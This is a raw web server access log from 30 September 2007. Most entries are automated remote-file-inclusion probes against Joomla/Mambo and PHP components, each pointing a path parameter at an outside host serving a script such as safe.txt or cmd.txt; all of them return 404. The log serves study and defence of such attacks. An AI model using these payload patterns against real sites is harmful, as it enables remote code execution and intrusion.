72.37.212.31 - - [30/Sep/2007:17:00:23 -0700] "GET /logs/access_070625.log//modules/agendax/addevent.inc.php?agendax_path=http://www.69mb.net/users/cmdgroup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.31 - - [30/Sep/2007:17:00:23 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.69mb.net/users/cmdgroup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.31 - - [30/Sep/2007:17:00:23 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.69mb.net/users/cmdgroup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.168.124.37 - - [30/Sep/2007:17:01:34 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.freewebs.com/qmono/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.216.238.230 - - [30/Sep/2007:17:02:49 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.ilegaistcl.xpg.com.br/res.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.216.238.230 - - [30/Sep/2007:17:02:50 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.ilegaistcl.xpg.com.br/res.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
200.168.124.37 - - [30/Sep/2007:17:02:53 -0700] "GET /logs/access_070806.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebs.com/qmono/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.68.242.58 - - [30/Sep/2007:17:03:02 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.godsteam.org/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.68.242.58 - - [30/Sep/2007:17:03:02 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.godsteam.org/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.168.124.37 - - [30/Sep/2007:17:03:05 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebs.com/qmono/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.37.212.31 - - [30/Sep/2007:17:03:29 -0700] "GET /logs/access_070716.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.69mb.net/users/cmdgroup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.31 - - [30/Sep/2007:17:03:29 -0700] "GET /logs/access_070604.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.69mb.net/users/cmdgroup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.168.87.183 - - [30/Sep/2007:17:03:52 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
200.168.87.183 - - [30/Sep/2007:17:03:53 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69"
67.19.12.2 - - [30/Sep/2007:17:04:28 -0700] "GET /logs/access_070910.log/mainfile.php?MAIN_PATH=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.19.12.2 - - [30/Sep/2007:17:04:29 -0700] "GET /logs/access_070827.log/mainfile.php?MAIN_PATH=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.44.86.192 - - [30/Sep/2007:17:04:59 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.flylink.psi.br/arquivos/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.44.86.192 - - [30/Sep/2007:17:04:59 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.flylink.psi.br/arquivos/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.92.172.107 - - [30/Sep/2007:17:05:13 -0700] "GET /logs/scripts.log HTTP/1.1" 206 78220 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
67.28.112.252 - - [30/Sep/2007:17:05:42 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.252 - - [30/Sep/2007:17:05:42 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.252 - - [30/Sep/2007:17:05:42 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
67.28.112.252 - - [30/Sep/2007:17:05:43 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.252 - - [30/Sep/2007:17:05:43 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.252 - - [30/Sep/2007:17:05:43 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.60.80.10 - - [30/Sep/2007:17:07:36 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kinkware.com/shop/pub/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.80.10 - - [30/Sep/2007:17:07:36 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kinkware.com/shop/pub/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
62.149.196.76 - - [30/Sep/2007:17:09:52 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.149.196.76 - - [30/Sep/2007:17:09:58 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
220.128.138.106 - - [30/Sep/2007:17:10:12 -0700] "GET /logs/access_070806.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://manxdate.com/id_img/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
61.44.86.192 - - [30/Sep/2007:17:10:20 -0700] "GET /logs/access_070910.log//skin/zero_vote/error.php?dir=http://www.flylink.psi.br/arquivos/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
220.128.138.106 - - [30/Sep/2007:17:10:20 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://manxdate.com/id_img/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
202.60.80.10 - - [30/Sep/2007:17:14:00 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.kinkware.com/shop/pub/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.80.10 - - [30/Sep/2007:17:14:00 -0700] "GET //skin/zero_vote/error.php?dir=http://www.kinkware.com/shop/pub/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.37.212.31 - - [30/Sep/2007:17:15:32 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.69mb.net/users/cmdgroup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.31 - - [30/Sep/2007:17:15:32 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.69mb.net/users/cmdgroup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.28.112.244 - - [30/Sep/2007:17:15:37 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.244 - - [30/Sep/2007:17:15:37 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.46.25.57 - - [30/Sep/2007:17:15:48 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://manxdate.com/id_img/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
69.46.25.57 - - [30/Sep/2007:17:15:48 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://manxdate.com/id_img/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
87.106.87.147 - - [30/Sep/2007:17:18:19 -0700] "GET /logs/access_070625.log/content.php?inc=http://www.69mb.net/users/cmdgroup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.87.147 - - [30/Sep/2007:17:18:19 -0700] "GET /content.php?inc=http://www.69mb.net/users/cmdgroup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.87.147 - - [30/Sep/2007:17:18:20 -0700] "GET /logs/content.php?inc=http://www.69mb.net/users/cmdgroup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.68.242.58 - - [30/Sep/2007:17:18:29 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.godsteam.org/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.46.25.57 - - [30/Sep/2007:17:18:44 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://manxdate.com/id_img/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
69.46.25.57 - - [30/Sep/2007:17:18:45 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://manxdate.com/id_img/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
212.241.212.230 - - [30/Sep/2007:17:20:19 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://servercom1245.tripod.com/bypassid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
212.241.212.230 - - [30/Sep/2007:17:20:20 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://servercom1245.tripod.com/bypassid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
200.25.236.26 - - [30/Sep/2007:17:22:27 -0700] "GET /logs/index.php3?aide=http://www.vasselai.com.br/hp/empresa/pioneiros/.r/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.25.236.26 - - [30/Sep/2007:17:22:28 -0700] "GET /index.php3?aide=http://www.vasselai.com.br/hp/empresa/pioneiros/.r/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.25.164.142 - - [30/Sep/2007:17:23:51 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.101.170.85 - - [30/Sep/2007:17:24:34 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
209.101.170.85 - - [30/Sep/2007:17:24:34 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
209.101.170.85 - - [30/Sep/2007:17:24:35 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.101.170.85 - - [30/Sep/2007:17:24:35 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.149.226.153 - - [30/Sep/2007:17:25:43 -0700] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Danger hiptop 2.0; U; AvantGo 3.2)" "www.galf.org"
209.25.164.142 - - [30/Sep/2007:17:26:43 -0700] "GET /logs/access_070625.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.25.164.142 - - [30/Sep/2007:17:26:43 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.58.187.146 - - [30/Sep/2007:17:26:51 -0700] "GET /logs/index2.php?content=http://bsnet.web.id/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.58.187.146 - - [30/Sep/2007:17:26:51 -0700] "GET /index2.php?content=http://bsnet.web.id/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.53.138.150 - - [30/Sep/2007:17:27:40 -0700] "GET /logs/access_070716.log//index.php?p=http://lebrat.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.138.150 - - [30/Sep/2007:17:27:40 -0700] "GET //index.php?p=http://lebrat.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.138.150 - - [30/Sep/2007:17:27:41 -0700] "GET /logs//index.php?p=http://lebrat.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.25.138 - - [30/Sep/2007:17:29:36 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
74.6.23.153 - - [30/Sep/2007:17:29:36 -0700] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
217.68.242.58 - - [30/Sep/2007:17:29:55 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.godsteam.org/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.68.242.58 - - [30/Sep/2007:17:29:55 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.godsteam.org/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.53.138.150 - - [30/Sep/2007:17:30:28 -0700] "GET /logs/access_070604.log//index.php?p=http://lebrat.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.106.179.35 - - [30/Sep/2007:17:31:22 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.31 - - [30/Sep/2007:17:31:27 -0700] "GET /logs/access_070625.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.69mb.net/users/cmdgroup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.31 - - [30/Sep/2007:17:31:27 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.69mb.net/users/cmdgroup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.31 - - [30/Sep/2007:17:31:27 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.69mb.net/users/cmdgroup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.60.80.10 - - [30/Sep/2007:17:31:41 -0700] "GET /logs/index.php?go=http://www.kinkware.com/shop/pub/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.80.10 - - [30/Sep/2007:17:31:42 -0700] "GET /index.php?go=http://www.kinkware.com/shop/pub/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.138.150 - - [30/Sep/2007:17:31:44 -0700] "GET /logs/access_070716.log//index.php?p=http://lebrat.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.138.150 - - [30/Sep/2007:17:31:45 -0700] "GET //index.php?p=http://lebrat.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.138.150 - - [30/Sep/2007:17:31:45 -0700] "GET /logs//index.php?p=http://lebrat.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
194.186.94.51 - - [30/Sep/2007:17:31:58 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.186.94.51 - - [30/Sep/2007:17:31:59 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.186.94.51 - - [30/Sep/2007:17:31:59 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.68.242.58 - - [30/Sep/2007:17:32:11 -0700] "GET /logs/access_070827.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.godsteam.org/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.25.236.26 - - [30/Sep/2007:17:32:21 -0700] "GET /logs/scripts.log/index.php3?aide=http://www.vasselai.com.br/hp/empresa/pioneiros/.r/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.89.224.76 - - [30/Sep/2007:17:33:04 -0700] "GET /logs/access_070924.log HTTP/1.0" 200 5349452 "-" "Wget/1.10.2" "galf.org"
208.53.158.100 - - [30/Sep/2007:17:33:17 -0700] "GET /logs/manager/frontinc/prepend.php?_PX_config[manager_path]=3D=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.158.100 - - [30/Sep/2007:17:33:18 -0700] "GET /manager/frontinc/prepend.php?_PX_config[manager_path]=3D=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.25.236.26 - - [30/Sep/2007:17:33:25 -0700] "GET /logs/access.log/index.php3?aide=http://www.vasselai.com.br/hp/empresa/pioneiros/.r/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.174.237.2 - - [30/Sep/2007:17:33:48 -0700] "GET /logs/access.log HTTP/1.0" 200 17805 "http://www.google.com.br/search?q=index.php%3F_REQUEST%3D%26_REQUEST%5Boption%5D%3D&hl=pt-BR&start=10&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7" "www.galf.org"
200.174.237.2 - - [30/Sep/2007:17:33:52 -0700] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7" "www.galf.org"
72.37.212.31 - - [30/Sep/2007:17:34:31 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.69mb.net/users/cmdgroup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.31 - - [30/Sep/2007:17:34:31 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.69mb.net/users/cmdgroup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.31 - - [30/Sep/2007:17:34:31 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.69mb.net/users/cmdgroup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.53.138.150 - - [30/Sep/2007:17:34:49 -0700] "GET /logs/access_070604.log//index.php?p=http://lebrat.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.37.212.31 - - [30/Sep/2007:17:36:40 -0700] "GET /logs/access_070827.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.69mb.net/users/cmdgroup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.99.239.51 - - [30/Sep/2007:17:36:46 -0700] "GET /logs/index.php3?aide=http://www.vasselai.com.br/hp/empresa/pioneiros/.r/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
62.99.239.51 - - [30/Sep/2007:17:36:51 -0700] "GET /index.php3?aide=http://www.vasselai.com.br/hp/empresa/pioneiros/.r/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
89.55.7.214 - - [30/Sep/2007:17:37:35 -0700] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=PRINTCMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
89.55.7.214 - - [30/Sep/2007:17:37:41 -0700] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=PRINTCMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
213.218.133.171 - - [30/Sep/2007:17:37:51 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://shuters.africamediaonline.com/stat.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.218.133.171 - - [30/Sep/2007:17:37:52 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.27.33 - - [30/Sep/2007:17:38:22 -0700] "GET /logs/access_070702.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
208.53.138.150 - - [30/Sep/2007:17:39:33 -0700] "GET /logs/access_070716.log//index.php?p=http://lebrat.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.138.150 - - [30/Sep/2007:17:39:33 -0700] "GET //index.php?p=http://lebrat.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.138.150 - - [30/Sep/2007:17:39:33 -0700] "GET /logs//index.php?p=http://lebrat.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
194.186.45.234 - - [30/Sep/2007:17:39:57 -0700] "GET /logs//s.php?table=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.186.45.234 - - [30/Sep/2007:17:39:58 -0700] "GET //s.php?table=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.168.87.183 - - [30/Sep/2007:17:39:58 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
208.53.138.150 - - [30/Sep/2007:17:42:58 -0700] "GET /logs/access_070716.log//index.php?p=http://lebrat.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.138.150 - - [30/Sep/2007:17:42:58 -0700] "GET //index.php?p=http://lebrat.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.138.150 - - [30/Sep/2007:17:42:58 -0700] "GET /logs//index.php?p=http://lebrat.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.241.212.230 - - [30/Sep/2007:17:43:10 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://servercom1245.tripod.com/bypassid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.212.230 - - [30/Sep/2007:17:43:10 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://servercom1245.tripod.com/bypassid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
204.8.221.178 - - [30/Sep/2007:17:43:41 -0700] "GET /index.php?pagina=http://h1.ripway.com/s4w/eval.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.8.221.178 - - [30/Sep/2007:17:44:30 -0700] "GET /index.php?pagina=http://h1.ripway.com/s4w/eval.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.181.207.107 - - [30/Sep/2007:17:45:49 -0700] "GET /logs/index.php?go=http://71.102.93.10/WTS/bin/hak/idpitbull.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
209.181.207.107 - - [30/Sep/2007:17:45:49 -0700] "GET /index.php?go=http://71.102.93.10/WTS/bin/hak/idpitbull.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.212.230 - - [30/Sep/2007:17:47:36 -0700] "GET /logs/access_070910.log/admin/editor2/spaw_control.class.php?spaw_root=http://servercom1245.tripod.com/bypassid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.246.7.59 - - [30/Sep/2007:17:48:59 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
84.246.7.59 - - [30/Sep/2007:17:48:59 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
212.241.212.230 - - [30/Sep/2007:17:49:43 -0700] "GET /logs/access_070827.log/admin/editor2/spaw_control.class.php?spaw_root=http://servercom1245.tripod.com/bypassid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.110.210.144 - - [30/Sep/2007:17:50:08 -0700] "GET /logs/access_070820.log HTTP/1.0" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
62.99.239.51 - - [30/Sep/2007:17:50:39 -0700] "GET /logs/scripts.log/index.php3?aide=http://www.vasselai.com.br/hp/empresa/pioneiros/.r/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
208.53.138.150 - - [30/Sep/2007:17:50:45 -0700] "GET /logs/access.log//index.php?p=http://lebrat.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.246.7.59 - - [30/Sep/2007:17:51:08 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.246.7.59 - - [30/Sep/2007:17:51:09 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.99.239.51 - - [30/Sep/2007:17:51:32 -0700] "GET /logs/access.log/index.php3?aide=http://www.vasselai.com.br/hp/empresa/pioneiros/.r/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
200.216.238.230 - - [30/Sep/2007:17:51:59 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ilegaistcl.xpg.com.br/res.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
